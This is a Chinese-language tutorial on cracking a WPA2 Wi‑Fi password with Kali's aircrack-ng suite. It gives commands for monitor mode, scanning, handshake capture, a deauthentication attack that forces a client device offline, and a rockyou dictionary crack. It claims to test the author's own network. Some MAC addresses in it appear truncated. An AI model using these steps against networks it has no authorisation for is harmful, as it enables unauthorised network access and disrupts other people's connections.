会用kali破解wifi吗?

描述

准备好 [kali] 系统,电脑可以链接无线 wifi!! 使用 Aircrack-ng 进行暴力破解,linux 上已经安装此工具!

1. 执行以下命令查看电脑设备

 

iwconfig
Linux

检查出现 wlan0 即可! 因为本人电脑的特殊性,有一个单读网卡 wlan1(本案例用的 wlan1)

2. [监听]附近网络:

 

airmon-ng start wlan0
Linux

完成上述操作后,我门内再次用iwconfig的命令查看此时会如下图出现 wlan0mon,说明已经进入监听状态

Linux

3. 扫描附近的网络,开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式

 

airodump-ng wlan0mon
Linux

wlan0 信道出现问题,无法监听到附近 wifi;

如果依然无法解决,那应该就是 wlan0 硬件有问题了,那么就只能购买无线 usb 驱动了(这样就出现了 wlan1)

使用命令airmon-ng stop wlan0mon停止 wlan0 的监听,本机监听 wlan1:

 

airodump-ng wlan1

 

下图即是监听到的 wifi

Linux

破解主要用到的 BSSID 以及 CH;
这一步会输出两个列表,两个列表不停在刷新。  
第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:  
BSSID: 无线 AP 的硬件地址  
PWR: 信号强度,值是负数,绝对值越小表示信号越强  
CH: 无线网络信道  
ENC: 加密方式,我们要破解的是 WPA2  
ESSID: 无线网络的名称  
第二个列表表示某个无线网络中和用户设备的连接信息:  
BSSID: 无线 AP 的硬件地址  
STATION: 用户设备的硬件地址  
扫描列表会不停刷新,确定最终目标后按 Ctrl+C 退出。

 

4. 开始抓包,对自家 wifi 进行测试;使用命令:airodump-ng –bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon(本机是 wlan1)

 

airodump-ng --bssid DC1812:3A -c 1 -w /home/wifi wlan1 #信道1
Linux

station:链接的设备物理地址

5. 打开一个新的终端,开始对目标设备发起攻击,使用命令:aireplay-ng -<攻击模式> < 攻击次数 > -a 无线 AP 硬件地址 > -c < 用户设备硬件地址 > < 处于监听模式的网卡名称 >

对应会生成如图文件,在 /home/wifi 下:

 

aireplay-ng -0 0 -c F8D613:C5 -a DC1812:3A wlan1

 

扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。

只有当扫描状态后面出现 ][ WPA handshake: DC1812:3A 后,我们才拿到拿到进行破解的握手包。

所以我们可以同时使用 aireplay-ng 对目标设备进行攻击,使其掉线重新连接,这样我们就拿到了握手包。

Linux

拿到握手包后按 Ctrl+C 结束扫描即可。

发起攻击后,当 airodump-ng 成功拿到了握手包,使用 Ctrl+C 退出攻击。

查看握手包 wifi-01.cap,如果出现多个选择数字大的,如 wifi-02.cap、wifi-03.cap·······

Linux

6. 开始暴力破解 wifi 密码,使用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>

本人使用 kali 自带的字典:目录/usr/share/wordlists

 

aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-01.cap
Linux

 

这将会耗费很多时间,最终获取到密码或者没有获取到密码(那需要你更换一个密码词典再次尝试)

7.  信号更换命令:

 

iwconfig wlan1 channel 7

 

  审核编辑:汤梓红

 

打开APP阅读更多精彩内容
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉

全部0条评论

快来发表一下你的评论吧 !

×
20
完善资料,
赚取积分